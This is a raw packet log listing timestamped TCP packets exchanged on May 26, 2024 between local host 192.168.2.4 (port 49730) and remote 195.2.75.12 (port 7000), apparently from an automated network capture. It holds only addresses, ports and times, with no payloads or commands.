May 26, 2024 01:21:26.409286976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.409518003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.409818888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.409925938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.410109043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.410166025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.410542965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.410610914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.410736084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.410861015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.411529064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.411597013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.411643982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.411704063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.411828041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.412381887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.412484884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.412554026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.412695885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.412751913 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.415275097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.415311098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.415388107 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.446913958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.447382927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.447700977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.447762012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.448113918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.448154926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.448247910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.448436975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.448585033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.448854923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.448892117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.449067116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.451647997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.451788902 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.452822924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.452908993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.453057051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.453232050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.453327894 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.453329086 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.453406096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.453890085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.453958988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.454006910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.454185009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.454586983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.454622030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.454657078 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.454687119 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.454705954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.455312967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.455451012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.455514908 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.455621004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.455681086 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.456083059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.456171036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.456384897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.456393003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.456546068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.456870079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.456938982 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.457355022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.457464933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.457534075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.457662106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.457721949 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.458056927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.458180904 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.458357096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.458445072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.458786964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.458822012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.458846092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.458879948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.459533930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.459598064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.459610939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.459667921 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.459820032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.460347891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.461009979 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.461321115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.461357117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.462012053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.482168913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.482233047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.482270002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.482417107 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.482544899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.482860088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.483174086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.483236074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.483272076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.483442068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.487016916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.488080978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.490226984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.490375042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.490576982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.490612984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.490755081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.490807056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.490808010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.490931034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.490998030 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.491168022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.491334915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.491406918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.491548061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.491583109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.491700888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.491759062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.492306948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.492368937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.492400885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.492599964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.492814064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.493099928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.493217945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.493411064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.493454933 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.493742943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.493798971 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.493848085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.493882895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.494532108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.494594097 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.494618893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.494676113 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.494813919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.495277882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.495383024 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.495409012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.495563030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.495640993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.496006012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.496108055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.496290922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.496326923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.496332884 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.496490002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.496768951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.496885061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.496987104 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.497538090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.497628927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.497704029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.497826099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.498267889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.498373032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.498430967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.498769999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.498871088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.498905897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.498934031 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.498965025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.499751091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.499840021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.499876976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.499905109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.500318050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.500402927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.500536919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.500588894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.500646114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.501075029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.501447916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.501549006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.501580954 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.501825094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.501883984 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.501933098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.502100945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.502540112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.502631903 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.502645969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.502701044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.502832890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.503284931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.503319979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.503380060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.503833055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.503894091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.503946066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.505839109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.507399082 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.530764103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.532015085 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.538860083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.538948059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.538990974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.539021969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.539237022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.539422989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.539505005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.539659023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.540347099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.543478012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.543894053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.543940067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.543978930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.544012070 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.544017076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.544054985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.544420004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.544485092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.544529915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.546567917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.546838999 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.547199965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.547239065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.547275066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.547341108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.547487974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.547523975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.547560930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.547601938 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.547621012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.548043013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.548082113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.548116922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.548155069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.548173904 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.548188925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.548213005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.548224926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.548346043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.549035072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549071074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549104929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549139023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549148083 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.549173117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549207926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549235106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.549262047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.549941063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.549974918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550009966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550044060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550066948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.550081015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550148010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.550740957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550775051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550807953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.550812006 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.550873041 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.551235914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.552359104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.552392006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.552457094 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.576462030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.576527119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.576589108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.576679945 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.576679945 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.578582048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.578619957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.578818083 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.579591036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.579627037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.579911947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.580377102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.580585003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.580661058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.580708981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.580744028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.581379890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.581459045 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.581896067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.581931114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.581993103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.582848072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.582895041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.582952023 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.582966089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.583022118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.583123922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.583410978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.583445072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.583513975 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.583681107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.583857059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.583971024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.584072113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.584316015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.584376097 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.584506035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.584539890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.584595919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.584647894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.584800959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.584923029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.585077047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.585134983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.585721016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.585809946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.585999966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.586060047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.586405993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.586529970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.586548090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.586797953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.586868048 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.587032080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.587066889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.587133884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.587188959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.587352037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.587435007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.587867022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.587973118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.588071108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.588196993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.588232040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.588361025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.589426041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.597395897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.597450972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.597493887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.597518921 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.597637892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.597780943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.597894907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.598119974 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.598242044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.598375082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.598438978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.598596096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.598998070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.599117041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.599152088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.599174976 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.599206924 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.600644112 CEST	7000	49730	195.2.75.12	192.168.2.4
